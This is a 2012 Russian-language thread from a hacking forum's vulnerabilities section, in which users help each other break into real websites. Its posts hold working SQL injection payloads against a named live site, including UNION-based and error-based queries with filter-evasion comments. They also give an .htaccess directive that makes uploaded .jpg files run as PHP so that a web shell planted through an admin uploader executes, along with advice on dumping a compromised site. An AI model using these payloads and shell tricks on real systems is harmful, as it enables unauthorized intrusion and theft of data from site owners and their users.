HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.04.2012, 17:29
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774

Репутация: 26
По умолчанию

http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+

как тут обойти фильтрацию юниона?

З.Ы. разобрался, короче это из-за разных кодировок..

convert(table_name+using+нужная кодировка)

ток в моем случаи хз как узнать нужную...
 
Ответить с цитированием

  #2  
Старый 20.04.2012, 17:52
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Цитата:
Сообщение от smirk  
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+
как тут обойти фильтрацию юниона?
З.Ы. разобрался, короче это из-за разных кодировок..
convert(table_name+using+нужная кодировка)
ток в моем случаи хз как узнать нужную...
Там union не фильтруется. нет правна просмотр schema.tables.

http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+information_schema.columns+wher e+column_name+like+0x25696425--+
 
Ответить с цитированием

  #3  
Старый 20.04.2012, 19:34
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922

Репутация: 75


По умолчанию

такой вопрос, заливаю в админке через загрузчик изображений шелл, заливается нормально, только при открытии его

http://сайт.ру/userfiles/image/222_20110623183746.php

открывается его исходный код, что можно тут пидумать? поможел ли заливка .htaccess?

если да то с каким содержимым?
 
Ответить с цитированием

  #4  
Старый 20.04.2012, 19:37
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

попробуй с таким содержимым

Код:
AddType application/x-httpd-php .jpg 
AddHandler application/x-httpd-php .jpg
 
Ответить с цитированием

  #5  
Старый 21.04.2012, 08:25
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

пишу сканер SQLi

подскажите наиболее часто встречающиеся параметры на страницах

мой список:

Код:
id
page
num
name
p
n
нужно найти еще парочку популярных
 
Ответить с цитированием

  #6  
Старый 21.04.2012, 10:35
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от \/ITA  
пишу сканер SQLi
подскажите наиболее часто встречающиеся параметры на страницах
мой список:
Код:
id
page
num
name
p
n
нужно найти еще парочку популярных
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.

...результаты по запросу (inurl:"php?параметр=1"):

c - 31 900 000

cat - 21 300 000

category - 7 560 000

CatID - 4 850 000

pagina - 3 660 000

PID - 2 180 000

sn - 116 000

catalogid - 12 600
 
Ответить с цитированием

  #7  
Старый 21.04.2012, 11:05
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от mix0x0  
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600
спасибо за подсказку

нашел скулю в POST на одном сайте подставил site.ru?id=1"

выдает мне такое:

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query : 
            INSERT INTO
                ips(ip, cnt, last_url)
           VALUES("***.93.28.***", 1,"/?id=1"")
                ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""
я еще не пробовал инжектить в Insert или Update

где можно почитать посмотреть как это делается?
 
Ответить с цитированием

  #8  
Старый 21.04.2012, 11:27
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479

Репутация: 2
По умолчанию

Цитата:
Сообщение от mix0x0  
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600
Сканеры - гавно, лучше руками искать.
 
Ответить с цитированием

  #9  
Старый 21.04.2012, 12:15
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию

Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?

хееелп ми
 
Ответить с цитированием

  #10  
Старый 21.04.2012, 12:45
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от \/ITA  
спасибо за подсказку
нашел скулю в POST на одном сайте подставил
site.ru?id=1"
выдает мне такое:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query : 
            INSERT INTO
                ips(ip, cnt, last_url)
           VALUES("***.93.28.***", 1,"/?id=1"")
                ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""
я еще не пробовал инжектить в Insert или Update
где можно почитать посмотреть как это делается?
,(select+1+from(select+count(*),concat((select+tab le_name+from+information_schema.tables+limit+0,1), floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.